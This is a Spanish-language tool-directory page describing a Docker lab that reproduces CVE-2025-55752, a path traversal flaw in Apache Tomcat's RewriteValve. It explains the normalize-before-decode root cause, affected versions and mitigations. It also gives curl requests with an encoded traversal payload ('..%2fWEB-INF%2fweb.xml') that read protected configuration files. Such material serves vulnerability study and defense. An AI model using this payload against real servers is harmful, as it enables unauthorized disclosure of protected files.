Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55752 — # Entorno de reproducción basado en Docker para CVE-2025-55752, una vulnerabilidad de path traversal en RewriteValve de Apache Tomcat, que demuestra la falla de normalizar antes de decodificar y proporciona comandos de prueba. | Kitploit
Herramientas/GitHubGitHub/masahiro331/cve-2025-55752
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# Entorno de reproducción basado en Docker para CVE-2025-55752, una vulnerabilidad de path traversal en RewriteValve de Apache Tomcat, que demuestra la falla de normalizar antes de decodificar y proporciona comandos de prueba.

Ver Repositorio
143hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55752: Vulnerabilidad de Path Traversal en Apache Tomcat

Entorno de reproducción basado en Docker para CVE-2025-55752, una vulnerabilidad de path traversal en Apache Tomcat 10.1.44.

Descripción general

CVE-2025-55752 es una vulnerabilidad de path traversal en RewriteValve de Apache Tomcat causada por un procesamiento incorrecto del orden: la normalización de URL ocurre antes de la decodificación de URL. Esto permite a los atacantes eludir las restricciones de seguridad que protegen directorios como /WEB-INF/ mediante secuencias de path traversal codificadas en URL (..%2f).

Características de la vulnerabilidad

  • ID CVE: CVE-2025-55752
  • CVSS v3.1: 7.5 (ALTA)
  • CWE: CWE-22 (Path Traversal)
  • Componente: Apache Tomcat RewriteValve
  • Causa raíz: Orden de procesamiento normalizar-antes-de-decodificar

Versiones afectadas

SerieVersiones vulnerablesVersión parcheada
11.x11.0.0-M1 a 11.0.1011.0.11+
10.1.x10.1.0-M1 a 10.1.4410.1.45+
9.0.x9.0.0-M11 a 9.0.1089.0.109+
8.5.x8.5.6 a 8.5.100EOL - Sin parche

Inicio rápido

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

Pruebas de la vulnerabilidad

Prueba 1: Acceso directo a WEB-INF (Protegido)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

Esperado: 403 Forbidden

Prueba 2: Divulgación de información (Lectura de archivos protegidos)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

Esperado: 200 OK + contenido de web.xml (vulnerabilidad confirmada)

Cómo funciona

  1. Solicitud: /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve reescribe a: /files/..%2fWEB-INF%2fweb.xml
  3. Normalización de URL (antes de decodificar): %2f no se reconoce como /, .. sobrevive
  4. Decodificación de URL: %2f → / → /files/../WEB-INF/web.xml
  5. Resolución de ruta: /WEB-INF/web.xml

Problema del orden de procesamiento

root@kitploit:~
Correcto:    Decodificar → Normalizar → Comprobación de seguridad
Vulnerable: Normalizar → Decodificar → Comprobación de seguridad ✗

Corrección en Tomcat

  • GitHub: apache/tomcat commit 130d36d8
  • Corrección: Decodificar antes de normalizar

Mitigación

  1. Deshabilitar RewriteValve si no es necesario
  2. Deshabilitar el método PUT
  3. Reglas WAF para bloquear ../ y %2e%2e
  4. Actualizar a versiones parcheadas (10.1.45+, 9.0.109+, 11.0.11+)

Referencias

  • Seguridad de Apache Tomcat
  • NVD - CVE-2025-55752
  • OWASP Path Traversal
  • CWE-22: Limitación incorrecta de un nombre de ruta

Aviso legal

⚠️ ADVERTENCIA: NO implementar en producción. Usar únicamente en entornos de prueba aislados.

Descargar herramienta